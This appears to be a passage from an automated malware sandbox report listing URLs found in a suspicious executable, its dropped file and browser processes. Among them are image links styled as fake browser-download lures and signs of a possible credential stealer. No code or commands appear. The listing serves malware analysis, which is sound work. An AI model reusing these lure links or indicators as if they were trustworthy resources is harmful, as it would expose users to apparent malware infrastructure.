                      Source: chromecache_485.4.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey200-36dp/2x/gm_alert_gm_grey200_3
                      Source: chromecache_485.4.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey600-36dp/2x/gm_alert_gm_grey600_3
                      Source: chromecache_485.4.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2
                      Source: chromecache_485.4.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://gaana.com/
                      Source: chrome.exe, 00000002.00000003.2158726813.00002B4401780000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
                      Source: chrome.exe, 00000002.00000003.2158726813.00002B4401780000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/1
                      Source: chrome.exe, 00000002.00000003.2154791159.00002B440169C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2119302630.0000745800728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2155177550.00002B44016A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2119191592.000074580071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2152926565.00002B44016A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
                      Source: chrome.exe, 00000002.00000003.2158726813.00002B4401780000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/3
                      Source: chrome.exe, 00000002.00000003.2158726813.00002B4401780000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/6
                      Source: chrome.exe, 00000002.00000003.2158726813.00002B4401780000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/;
                      Source: chrome.exe, 00000002.00000003.2158726813.00002B4401780000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/=
                      Source: chrome.exe, 00000002.00000003.2158726813.00002B4401780000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/G
                      Source: chrome.exe, 00000002.00000003.2158726813.00002B4401780000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/J
                      Source: chrome.exe, 00000002.00000003.2158726813.00002B4401780000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
                      Source: chrome.exe, 00000002.00000003.2154791159.00002B440169C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2119302630.0000745800728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2155177550.00002B44016A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2119191592.000074580071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2152926565.00002B44016A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
                      Source: chrome.exe, 00000002.00000003.2161263204.00002B440192C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2161336411.00002B4401930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2161233398.00002B4401928000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/
                      Source: chrome.exe, 00000002.00000003.2154791159.00002B440169C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2155177550.00002B44016A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2152926565.00002B44016A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/b
                      Source: msedge.exe, 00000007.00000002.2324736445.0000462800394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                      Source: chrome.exe, 00000002.00000003.2154791159.00002B440169C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2155177550.00002B44016A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2152926565.00002B44016A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs27
                      Source: chrome.exe, 00000002.00000003.2154791159.00002B440169C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2155177550.00002B44016A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2152926565.00002B44016A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs2e
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.000000000080F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://i.i
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.000000000080F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://i.ib
                      Source: ECAFHDBGHJ.exe.0.drString found in binary or memory: https://i.ibb.co/31pRMq1/Firefox-Logo.png
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.000000000080F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://i.ibb.co/992LRRF/
                      Source: ECAFHDBGHJ.exe.0.drString found in binary or memory: https://i.ibb.co/992LRRF/download-edge.jpg
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.000000000080F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://i.ibb.co/9ND
                      Source: ECAFHDBGHJ.exe.0.drString found in binary or memory: https://i.ibb.co/9NDBWJ6/microsoft.png
                      Source: ECAFHDBGHJ.exe.0.drString found in binary or memory: https://i.ibb.co/Cs530ZW/downloading.jpg
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.000000000080F000.00000004.00000020.00020000.00000000.sdmp, ECAFHDBGHJ.exe.0.drString found in binary or memory: https://i.ibb.co/DtKpCHD/Brave-icon-app.png
                      Source: ECAFHDBGHJ.exe.0.drString found in binary or memory: https://i.ibb.co/GcYPBdt/google-logo.png
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.000000000080F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://i.ibb.co/JK?
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.000000000080F000.00000004.00000020.00020000.00000000.sdmp, ECAFHDBGHJ.exe.0.drString found in binary or memory: https://i.ibb.co/JKpFSmj/edge.png
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.000000000080F000.00000004.00000020.00020000.00000000.sdmp, ECAFHDBGHJ.exe.0.drString found in binary or memory: https://i.ibb.co/KjqPbXY/opera-logo.png
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.000000000080F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://i.ibb.co/LD
                      Source: ECAFHDBGHJ.exe.0.drString found in binary or memory: https://i.ibb.co/LDF99J2/brave-logo.png
                      Source: ECAFHDBGHJ.exe.0.drString found in binary or memory: https://i.ibb.co/RHLrNkd/download-brave.jpg
                      Source: ECAFHDBGHJ.exe.0.drString found in binary or memory: https://i.ibb.co/VBSbyN8/chrome-icon.png
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.000000000080F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://i.ibb.co/W5knd8Q/fi
                      Source: ECAFHDBGHJ.exe.0.drString found in binary or memory: https://i.ibb.co/W5knd8Q/firefox-logo.png
                      Source: ECAFHDBGHJ.exe.0.drString found in binary or memory: https://i.ibb.co/cFH0z8G/download-firefox.jpg
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.000000000080F000.00000004.00000020.00020000.00000000.sdmp, ECAFHDBGHJ.exe.0.drString found in binary or memory: https://i.ibb.co/kQ1yTXR/download-opera.jpg
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.000000000080F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://i.ibb.co/sWFTLkV/unknown-browser-icon.pn
                      Source: ECAFHDBGHJ.exe.0.drString found in binary or memory: https://i.ibb.co/sWFTLkV/unknown-browser-icon.png
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.000000000080F000.00000004.00000020.00020000.00000000.sdmp, ECAFHDBGHJ.exe.0.drString found in binary or memory: https://i.ibb.co/vQMfNDv/opera-logo2.png
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.000000000080F000.00000004.00000020.00020000.00000000.sdmp, ECAFHDBGHJ.exe.0.drString found in binary or memory: https://i.ibb.co/y0gs0MF/download-android.jpg
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://i.y.qq.com/n2/m/index.html
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.000000000080F000.00000004.00000020.00020000.00000000.sdmp, BKEHDGDGHCBGCAKFIIIE.0.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                      Source: msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/161903006
                      Source: msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/166809097
                      Source: msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/184850002
                      Source: msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/187425444
                      Source: msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/220069903
                      Source: msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/229267970
                      Source: msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/250706693
                      Source: msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/253522366
                      Source: msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/255411748
                      Source: msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/258207403
                      Source: msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/274859104
                      Source: msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/284462263
                      Source: msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/issues/166475273
                      Source: chrome.exe, 00000002.00000003.2156101440.00002B4401D2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2
                      Source: chrome.exe, 00000002.00000003.2156101440.00002B4401D2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard
                      Source: chrome.exe, 00000002.00000003.2119302630.0000745800728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2119191592.000074580071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
                      Source: chrome.exe, 00000002.00000003.2119302630.0000745800728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2119191592.000074580071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
                      Source: chrome.exe, 00000002.00000003.2119191592.000074580071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiments
                      Source: chrome.exe, 00000002.00000003.2154046798.00002B4401BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2153619388.00002B4401C84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2153973674.00002B4401BB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2153564567.00002B4401C7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2154111774.00002B4401CB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2153522625.00002B4401C74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search?source=ntp
                      Source: chrome.exe, 00000002.00000003.2133633558.00002B4401264000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2133429420.00002B440041C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2133633558.00002B440120C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/upload
                      Source: chrome.exe, 00000002.00000003.2133633558.00002B4401264000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2133429420.00002B440041C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2133633558.00002B440120C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/uploadbyurl
                      Source: chrome.exe, 00000002.00000003.2119302630.0000745800728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2119191592.000074580071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/2
                      Source: chrome.exe, 00000002.00000003.2119716785.0000745800878000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload
                      Source: chrome.exe, 00000002.00000003.2119191592.000074580071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2155424135.00002B440037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload2
                      Source: chrome.exe, 00000002.00000003.2154791159.00002B440169C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2155177550.00002B44016A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2152926565.00002B44016A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://m.kugou.com/
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://m.soundcloud.com/
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://m.vk.com/
                      Source: chrome.exe, 00000002.00000003.2163486067.00002B4401AE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/
                      Source: chrome.exe, 00000002.00000003.2154046798.00002B4401BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2153619388.00002B4401C84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2153973674.00002B4401BB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2153564567.00002B4401C7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2154111774.00002B4401CB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2153522625.00002B4401C74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=rm&amp;ogbl
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: https://mozilla.org0/
                      Source: msedge.exe, 00000007.00000002.2324736445.0000462800394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.cn/
                      Source: msedge.exe, 00000007.00000002.2324736445.0000462800394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.com/
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://music.amazon.com
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://music.apple.com
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://music.yandex.com
                      Source: chrome.exe, 00000002.00000003.2154791159.00002B440169C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2155177550.00002B44016A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2152926565.00002B44016A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email2B
                      Source: 000003.log4.9.drString found in binary or memory: https://ntp.msn.com
                      Source: 000003.log9.9.dr, 000003.log1.9.drString found in binary or memory: https://ntp.msn.com/
                      Source: 000003.log9.9.drString found in binary or memory: https://ntp.msn.com/0
                      Source: 000003.log9.9.dr, 2cc80dabc69f58b6_1.9.drString found in binary or memory: https://ntp.msn.com/edge/ntp
                      Source: 000003.log9.9.dr, 2cc80dabc69f58b6_1.9.drString found in binary or memory: https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=288
                      Source: Session_13374622942181148.9.drString found in binary or memory: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&start
                      Source: msedge.exe, 00000007.00000002.2324736445.0000462800394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://office.net/
                      Source: chrome.exe, 00000002.00000003.2153973674.00002B4401BB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2153564567.00002B4401C7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2154111774.00002B4401CB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2153522625.00002B4401C74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogads-pa.googleapis.com
                      Source: chrome.exe, 00000002.00000003.2154158801.00002B4400BC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com
                      Source: chrome.exe, 00000002.00000003.2153973674.00002B4401BB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2153564567.00002B4401C7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2154111774.00002B4401CB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2153522625.00002B4401C74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
                      Source: chrome.exe, 00000002.00000003.2153973674.00002B4401BB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2153564567.00002B4401C7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2154111774.00002B4401CB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2153522625.00002B4401C74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?eom=1
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://open.spotify.com
                      Source: chrome.exe, 00000002.00000003.2128298516.00002B4400768000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://outlook.live.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://outlook.live.com/mail/0/
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://outlook.live.com/mail/compose?isExtension=true
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://outlook.office.com/mail/0/
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://outlook.office.com/mail/compose?isExtension=true
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://outlook.office.com/mail/inbox?isExtension=true&sharedHeader=1&client_flight=outlookedge
                      Source: msedge.exe, 00000007.00000003.2244301590.0000462800270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2244428937.0000462800274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/AddSession
                      Source: msedge.exe, 00000007.00000003.2244301590.0000462800270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2244428937.0000462800274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/Logout
                      Source: msedge.exe, 00000007.00000003.2244301590.0000462800270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2244428937.0000462800274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/LogoutYxABzen
                      Source: msedge.exe, 00000007.00000003.2244301590.0000462800270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2244428937.0000462800274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/MergeSession
                      Source: msedge.exe, 00000007.00000003.2244301590.0000462800270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2244428937.0000462800274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/OAuthLogin
                      Source: msedge.exe, 00000007.00000003.2244301590.0000462800270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2244428937.0000462800274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/RotateBoundCookies
                      Source: msedge.exe, 00000007.00000003.2244301590.0000462800270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2244428937.0000462800274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/chrome/blank.html
                      Source: msedge.exe, 00000007.00000003.2244301590.0000462800270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2244428937.0000462800274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/o/oauth2/revoke
                      Source: msedge.exe, 00000007.00000003.2244301590.0000462800270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2244428937.0000462800274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth/multilogin
                      Source: msedge.exe, 00000007.00000003.2244301590.0000462800270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2244428937.0000462800274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v1/userinfo
                      Source: msedge.exe, 00000007.00000003.2244301590.0000462800270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2244428937.0000462800274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v2/tokeninfo
                      Source: msedge.exe, 00000007.00000003.2244301590.0000462800270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2244428937.0000462800274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v4/token
                      Source: msedge.exe, 00000007.00000003.2244301590.0000462800270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2244428937.0000462800274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/reauth/v1beta/users/
                      Source: msedge.exe, 00000007.00000003.2244301590.0000462800270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2244428937.0000462800274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/v1/issuetoken
                      Source: chrome.exe, 00000002.00000003.2133633558.00002B4401264000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2133429420.00002B440041C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2133633558.00002B440120C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
                      Source: chromecache_485.4.drString found in binary or memory: https://play.google.com/log?format=json&hasfast=true
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://powerpoint.new?from=EdgeM365Shoreline
                      Source: chrome.exe, 00000002.00000003.2154791159.00002B440169C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2155177550.00002B44016A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2152926565.00002B44016A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
                      Source: chrome.exe, 00000002.00000003.2154791159.00002B440169C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2155177550.00002B44016A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2152926565.00002B44016A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
                      Source: chrome.exe, 00000002.00000003.2154791159.00002B440169C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2155177550.00002B44016A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2152926565.00002B44016A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                      Source: chrome.exe, 00000002.00000003.2154791159.00002B440169C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2155177550.00002B44016A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2152926565.00002B44016A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
                      Source: chrome.exe, 00000002.00000003.2152926565.00002B44016A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                      Source: chrome.exe, 00000002.00000003.2152926565.00002B44016A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.com2
                      Source: chrome.exe, 00000002.00000003.2154791159.00002B440169C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2155177550.00002B44016A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2152926565.00002B44016A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comJv
                      Source: chrome.exe, 00000002.00000003.2154791159.00002B440169C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2155177550.00002B44016A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2152926565.00002B44016A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comb
                      Source: chrome.exe, 00000002.00000003.2154046798.00002B4401BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2153619388.00002B4401C84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2153973674.00002B4401BB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2153564567.00002B4401C7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2154111774.00002B4401CB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2153522625.00002B4401C74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
                      Source: hwWxZRwpeL.exe, 00000000.00000003.2492924259.0000000021422000.00000004.00000020.00020000.00000000.sdmp, JKJKJJDBKEGIECAAECFHCFBGIJ.0.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
